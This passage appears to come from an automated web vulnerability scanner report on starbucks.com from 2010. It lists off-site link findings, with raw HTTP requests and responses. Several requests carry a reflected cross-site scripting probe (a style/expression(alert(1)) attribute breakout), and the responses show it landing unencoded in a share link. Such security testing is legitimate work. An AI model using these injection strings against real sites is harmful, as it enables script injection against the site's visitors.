<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...
<div>
       <img class="tracking" src="http://leadback.advertising.com/adcedge/lb?site=695501&amp;srvc=1&amp;betr=starb_cs=1&amp;betq=9909=414691" alt="" />
       
       <object class="tracking" data="https://fls.vulnerable.ad.partner/activityi;src=2206715;type=starb723;cat=starb998;ord=92400215?"></object>
...[SNIP]...

9.2. http://www.starbucks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains. As in 9.1, the AddThis share link below embeds the request URL, query string included, unencoded in its url= parameter, so the query string is disclosed to addthis.com as link content independently of Referer behaviour, and the reflected double quote terminates the href attribute (the sink reported under 3.1).

Request

GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:17:44 GMT
Content-Length: 41214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<dd id="get_flash"><a href="http://get.adobe.com/flashplayer/"><img src="/static/images/plugins/get_flashplayer.gif" alt="Get Flash" /></a><a href="http://get.adobe.com/flashplayer/">For an enhanced experience install flash</a>
...[SNIP]...
<li id="community_msi"><a href="http://www.mystarbucksidea.com">Share your ideas on <strong>
...[SNIP]...
<li id="community_facebook"><a href="http://www.facebook.com/starbucks">Find us on <strong>
...[SNIP]...
<li id="community_twitter"><a href="http://www.twitter.com/starbucks">Follow us on <strong>
...[SNIP]...
<h2><a href="http://www.starbucksstore.com/Tours/">Take a Taste Journey</a>
...[SNIP]...
<p style="background-color:#330000"><a href="http://www.starbucksstore.com/Tours/">Learn about the richness and complexity of our coffees & teas through our carefully selected coffee & tea tours.</a>
...[SNIP]...
<p><a href="http://starbucks.tekgroup.com/news/">See All News Headlines</a>
...[SNIP]...
</span>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=1" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...
<div>
       <img class="tracking" src="http://leadback.advertising.com/adcedge/lb?site=695501&amp;srvc=1&amp;betr=starb_cs=1&amp;betq=9909=414691" alt="" />
       
       <object class="tracking" data="https://fls.vulnerable.ad.partner/activityi;src=2206715;type=starb723;cat=starb998;ord=43878730?"></object>
...[SNIP]...

9.3. http://www.starbucks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains. This request sends the parameter name with the quotes URL-encoded (%22); the response still decodes it and embeds the resulting URL unencoded in the AddThis share link's url= parameter, so the query string is disclosed to addthis.com as link content and the decoded double quote terminates the href attribute (the sink reported under 3.2).

Request

GET /?8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; _chartbeat2=qspoj3z1snwoz3gj

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=h40ppc45qn2lqbyzsej1fh55; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:40:26 GMT
Content-Length: 41208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<dd id="get_flash"><a href="http://get.adobe.com/flashplayer/"><img src="/static/images/plugins/get_flashplayer.gif" alt="Get Flash" /></a><a href="http://get.adobe.com/flashplayer/">For an enhanced experience install flash</a>
...[SNIP]...
<li id="community_msi"><a href="http://www.mystarbucksidea.com">Share your ideas on <strong>
...[SNIP]...
<li id="community_facebook"><a href="http://www.facebook.com/starbucks">Find us on <strong>
...[SNIP]...
<li id="community_twitter"><a href="http://www.twitter.com/starbucks">Follow us on <strong>
...[SNIP]...
<h2><a href="http://www.starbucksstore.com/Tours/">Take a Taste Journey</a>
...[SNIP]...
<p style="background-color:#330000"><a href="http://www.starbucksstore.com/Tours/">Learn about the richness and complexity of our coffees & teas through our carefully selected coffee & tea tours.</a>
...[SNIP]...
<p><a href="http://starbucks.tekgroup.com/news/">See All News Headlines</a>
...[SNIP]...
</span>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=1" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...
<div>
       <img class="tracking" src="http://leadback.advertising.com/adcedge/lb?site=695501&amp;srvc=1&amp;betr=starb_cs=1&amp;betq=9909=414691" alt="" />
       
       <object class="tracking" data="https://fls.vulnerable.ad.partner/activityi;src=2206715;type=starb723;cat=starb998;ord=46362303?"></object>
...[SNIP]...

9.4. http://www.starbucks.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /search?keywords=%27&61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com
Cookie: ASP.NET_SessionId=new0hf55b2avrbbgt3d0fz45; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:41:04 GMT
Content-Length: 33815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</span>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/search?keywords='&61fd7"style="x:expression(alert(1))"61073b145fc=1" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
